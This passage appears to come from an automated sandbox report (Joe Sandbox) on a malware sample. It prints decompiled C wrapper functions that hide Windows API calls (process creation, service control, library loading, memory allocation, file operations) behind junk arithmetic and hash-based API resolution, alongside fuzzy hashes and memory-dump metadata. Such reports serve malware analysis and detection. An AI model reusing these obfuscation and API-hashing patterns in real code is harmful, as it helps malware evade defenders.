                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: c4d64e3cc73c27c49a41d7a074d8ef1589bee526cc75bce5aa04c1acc0b4dec6
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: C111D2B6C01219EBDF05DF94C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001DE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: bc6b326a41a5d26bea6e29ba8bc052ecf4b9a8ac294c75c02919a97063cff55d
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 36113060D08289EAEF01D7E884097FEBFB55B21705F044098E5446B282D3BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0028B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 40%
                                                                      			E0028B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00282550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00277378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0028b876
                                                                      0x0028b87b
                                                                      0x0028b87d
                                                                      0x0028b87e
                                                                      0x0028b881
                                                                      0x0028b884
                                                                      0x0028b887
                                                                      0x0028b88a
                                                                      0x0028b88d
                                                                      0x0028b890
                                                                      0x0028b891
                                                                      0x0028b892
                                                                      0x0028b893
                                                                      0x0028b896
                                                                      0x0028b897
                                                                      0x0028b89a
                                                                      0x0028b89d
                                                                      0x0028b8a0
                                                                      0x0028b8a4
                                                                      0x0028b8a5
                                                                      0x0028b8aa
                                                                      0x0028b8bb
                                                                      0x0028b8c3
                                                                      0x0028b8c6
                                                                      0x0028b8ca
                                                                      0x0028b8d1
                                                                      0x0028b8d8
                                                                      0x0028b8df
                                                                      0x0028b8e6
                                                                      0x0028b8ed
                                                                      0x0028b8f1
                                                                      0x0028b8f4
                                                                      0x0028b8fb
                                                                      0x0028b902
                                                                      0x0028b909
                                                                      0x0028b928
                                                                      0x0028b942
                                                                      0x0028b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0028B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 897c8426967861aa73a39c6a5c28127b4da1702aa2e6a141c9d2bfe95753a911
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: C721B372800248FBDF159F95CD09CDFBFB9FB89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0027471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E0027471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00282550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00277378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x0027473b
                                                                      0x00274740
                                                                      0x0027474a
                                                                      0x00274753
                                                                      0x0027475a
                                                                      0x00274761
                                                                      0x00274765
                                                                      0x0027476f
                                                                      0x00274772
                                                                      0x00274775
                                                                      0x0027477c
                                                                      0x00274788
                                                                      0x00274789
                                                                      0x0027478e
                                                                      0x00274792
                                                                      0x00274799
                                                                      0x002747aa
                                                                      0x002747ad
                                                                      0x002747b4
                                                                      0x002747d3
                                                                      0x002747e4
                                                                      0x002747ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 002747E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 07ec160735996aaa3cf2d5d133ef632512a448bea8b0d4487e4ac83e634d60c9
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 45210372D01208FBEF05DFE4C94A8DEBBB5EF05354F108089E924A6250D3B59B20DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0028340E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E0028340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E00282550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E00277378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}













                                                                      0x00283415
                                                                      0x0028341a
                                                                      0x0028341b
                                                                      0x0028341e
                                                                      0x00283423
                                                                      0x0028342d
                                                                      0x00283432
                                                                      0x00283439
                                                                      0x00283442
                                                                      0x00283447
                                                                      0x0028344c
                                                                      0x00283453
                                                                      0x0028345a
                                                                      0x00283461
                                                                      0x00283468
                                                                      0x0028346f
                                                                      0x00283476
                                                                      0x00283481
                                                                      0x0028348d
                                                                      0x00283490
                                                                      0x00283497
                                                                      0x002834a8
                                                                      0x002834ab
                                                                      0x002834b2
                                                                      0x002834c6
                                                                      0x002834d3
                                                                      0x002834d9

                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 002834D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: ffee0aa5d97f5ea3d8d452408ac03b5bee409afa2b1c39826385f52162eedd47
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 812113B1D0131DEBDB08DFA9C84A8EFBBB4FB00314F10819AE414AA280D3B55B148F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00280321, Relevance: 1.6, APIs: 1, Instructions: 59serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00280321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00282550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E00277378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}













                                                                      0x00280329
                                                                      0x0028032c
                                                                      0x0028032e
                                                                      0x00280330
                                                                      0x00280333
                                                                      0x00280336
                                                                      0x00280337
                                                                      0x00280338
                                                                      0x0028033d
                                                                      0x00280344
                                                                      0x0028034b
                                                                      0x00280352
                                                                      0x00280359
                                                                      0x0028035c
                                                                      0x00280363
                                                                      0x0028037e
                                                                      0x00280386
                                                                      0x00280389
                                                                      0x00280390
                                                                      0x00280397
                                                                      0x0028039e
                                                                      0x002803a6
                                                                      0x002803a9
                                                                      0x002803b0
                                                                      0x002803bb
                                                                      0x002803c2
                                                                      0x002803c5
                                                                      0x002803c9
                                                                      0x002803dc
                                                                      0x002803e9
                                                                      0x002803f0

                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 002803E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 6b96b896a59230665fd812cf47de34d5d63b4d3c1db0b2097dc862b9c06036bb
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: D021DFB1C01209FBDB14DFA5CA8A89EBFB8EB45304F108199E825B6251D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002849CF, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E002849CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E00282550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E00277378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}














                                                                      0x002849d5
                                                                      0x002849da
                                                                      0x002849df
                                                                      0x002849e6
                                                                      0x002849ef
                                                                      0x002849f6
                                                                      0x002849fa
                                                                      0x00284a03
                                                                      0x00284a08
                                                                      0x00284a0d
                                                                      0x00284a14
                                                                      0x00284a1b
                                                                      0x00284a22
                                                                      0x00284a29
                                                                      0x00284a30
                                                                      0x00284a37
                                                                      0x00284a3e
                                                                      0x00284a45
                                                                      0x00284a4f
                                                                      0x00284a54
                                                                      0x00284a5c
                                                                      0x00284a64
                                                                      0x00284a67
                                                                      0x00284a6e
                                                                      0x00284a8d
                                                                      0x00284a98
                                                                      0x00284a9d

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00284A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: 5425035d161457b7a7c3c80164d743e1235a6d8406ee40029cc5c3e3854eda5a
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: B32129B5E0020CFBDB08CFE5C94A5EEBBB1EB40304F10C099E518A7291D7B96B549F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002841CA, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E002841CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E00282550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E00277378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}












                                                                      0x002841d6
                                                                      0x002841e5
                                                                      0x002841ea
                                                                      0x002841fb
                                                                      0x00284203
                                                                      0x00284206
                                                                      0x0028420d
                                                                      0x00284214
                                                                      0x00284218
                                                                      0x0028421f
                                                                      0x00284226
                                                                      0x0028422d
                                                                      0x00284234
                                                                      0x00284238
                                                                      0x0028423f
                                                                      0x00284246
                                                                      0x0028424d
                                                                      0x00284254
                                                                      0x0028425b
                                                                      0x0028427a
                                                                      0x0028428a
                                                                      0x00284290

                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0028428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 8b6db1a90477232d3649273504659515e576b49d56e8c3f9cf203c97dafddb79
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: C4115C72E00309FFEB04DFE4CC4AAAEBBB5EF44710F108088E92466291D7B55B249F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00275AB8, Relevance: 1.6, APIs: 1, Instructions: 51serviceCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E00275AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00282550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E00277378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}










                                                                      0x00275abe
                                                                      0x00275ac1
                                                                      0x00275ac4
                                                                      0x00275ac9
                                                                      0x00275ace
                                                                      0x00275ad8
                                                                      0x00275ae1
                                                                      0x00275ae8
                                                                      0x00275aef
                                                                      0x00275af6
                                                                      0x00275b00
                                                                      0x00275b0b
                                                                      0x00275b0e
                                                                      0x00275b15
                                                                      0x00275b1c
                                                                      0x00275b23
                                                                      0x00275b2a
                                                                      0x00275b34
                                                                      0x00275b37
                                                                      0x00275b3e
                                                                      0x00275b45
                                                                      0x00275b48
                                                                      0x00275b4c
                                                                      0x00275b53
                                                                      0x00275b6c
                                                                      0x00275b77
                                                                      0x00275b7c

                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00275B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 05c517dacbbd85889b9a74697bf87fb67dd308bbb702ee817293bc9753386a09
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 3E110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F508599E525A6291D7B99B25DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0027E554, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E0027E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00282550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E00277378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}











                                                                      0x0027e55b
                                                                      0x0027e55e
                                                                      0x0027e560
                                                                      0x0027e562
                                                                      0x0027e567
                                                                      0x0027e571
                                                                      0x0027e57a
                                                                      0x0027e581
                                                                      0x0027e588
                                                                      0x0027e58c
                                                                      0x0027e595
                                                                      0x0027e59d
                                                                      0x0027e5a0
                                                                      0x0027e5a7
                                                                      0x0027e5ae
                                                                      0x0027e5b5
                                                                      0x0027e5bc
                                                                      0x0027e5c3
                                                                      0x0027e5ca
                                                                      0x0027e5d1
                                                                      0x0027e5d8
                                                                      0x0027e5dc
                                                                      0x0027e5e3
                                                                      0x0027e602
                                                                      0x0027e60b
                                                                      0x0027e611

                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0027E60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: ce30d03d0b849cd46b4b81a6fb174705f6418538b64af2bbb5abaef6e51e5c69
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: F71123B1D01318BBEB18DFA4C84A8DEBBB4FB00718F108598E82576241D3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0027EB1E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E0027EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00282550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
